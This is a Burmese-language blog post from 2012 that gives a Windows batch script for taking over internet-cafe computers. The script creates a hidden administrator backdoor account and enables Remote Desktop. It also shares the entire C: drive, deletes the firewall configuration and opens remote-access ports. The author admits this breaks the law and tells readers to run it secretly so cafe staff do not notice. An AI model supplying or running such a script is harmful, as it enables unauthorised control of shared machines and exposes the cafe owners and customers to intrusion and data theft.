Social Icons

Pages

Tuesday, November 20, 2012

inter net ဆိုင္အတြင္းမွာရွိတဲ့ firewall ကိုခ်ိုးျဖက္မယ္

ကဲ ညီေလးတို့ေရ ကိုသံုးတဲ့ inter net ဆိုင္မွာရွိတဲ့  firewall တစ္ခုလံုးကိုခ်ိုးေဖာက္ဟက္ျပစ္

မယ္ firewall ဆိုတာက ကိုယ္ရဲ့ net work ထဲကိုအျခား ဟက္ကာေတြ
မ၀င္ေအာင္ကာကြယ္ေပးတဲ့ လံုျခံုေရးေရး စနစ္ အင္တာနက္ဆိုင္တိုင္းမရွိမျဖစ္ထားရတဲ့ စနစ္ျကီး ဟက္ကာတစ္ေယာက္က net work ကိုဟက္မယ္ဆိုရင္
ဒါကိုခ်ိုးနိုင္မွရမယ္ လြယ္လြယ္ေလးေနာ္ back door ေခါ္ တရွိဂ်င္ virus ေရးျပီးဟက္မွာ 

ပတမ

start ထဲ၀င္ ,taskbar  မွာရွိတယ္ အဲဒီက programs .ျပီးရင္ .Accessories ထဲက command prompt ထဲ၀င္လိုက္ပါ

ဒါမွမဟုပ္ရင္ start >run box   မွာ cmd , လို့ရွိဳက္ပါ

cmd ထဲေရာက္ရင္ cd:// လိုအရင္ရွိုက္လိုက္  . ျပီးရင္ c:// လို့ထက္ရွိုက္ ျပီးတာနဲ့ ဒီcoad ေလးကိုကူးျပီး


@echo off
REM ......: Created By Jigsaw :......
REM ......: HackPcOnline.Com :......

REM EDIT THESE SETTINGS
set username=USERNAME
set password=PASSWORD
set rdport=3389
set tnport=23
set rport=CHANGE_THIS
REM END EDITING SETTINGS

REM Adding The Backdoor
net user %username% %password% /add
REM Pause For Process
ping localhost -n 2 >nul
REM Adding Admin Access The Backdoor
net localgroup Administrators %username% /add
REM Hiding The Backdoor From Start Menu
REG add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /%username% /t REG_DWORD /d 0 /f >nul
REM Enabling Terminal Service
REG add HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0
REM Share C:\
net share system=C:\ /unlimited
REM Stealing The IP Stuff
ipconfig /all >> C:\attach.txt
REM Deleting The Firewall Configuration
netsh firewall delete
REM Opening Ports
netsh firewall add portopening TCP %rdport% "WinSvcService"
netsh firewall add portopening TCP %tnport2% "WinSvcService"
netsh firewall add portopening TCP %rport% "WinSvcService"
cls
exit


ထဲ့လိုက္ဒါဆိုရင္ သူအလိုလို firewall ကိုခ်ိုးျဖက္ျပစ္ပါလိမ္မယ္ ျပီးရင္ exit ျပလိမ္မယ္ enterေခါက္ျပီးျပီး

ဒီနည္းကိုအျပင္  inter net ဆိုင္မွာသံုးသူလုပ္ေဆာင္မဲ့သူမ်ားလူမပါသိေစနဲ့ သိရင္ ဥပေဒနဲ့ညိတယ္ေနာ္ ခိုးေျကာင္ခိုး၀ွက္လုပ္ျကပါ
မသိတာရွိရင္ေမးျကပါ
ေနာက္ notepad ထဲမွာ bat file အေနနဲ့ save ျပီးသံုးလို့ရတယ္ ခ်ို့ဆိုင္ေတြက vbs.bat ,script တို့ကိုပိတ္ထားလို့
command ထဲကတိုက္ရွိုက္ေမာင္းတာ
၀န္ခံခ်က္ ..............ကိုအာကာၿဖိဳးဆီမွ ေ၀မွ်သည္။

No comments:

Post a Comment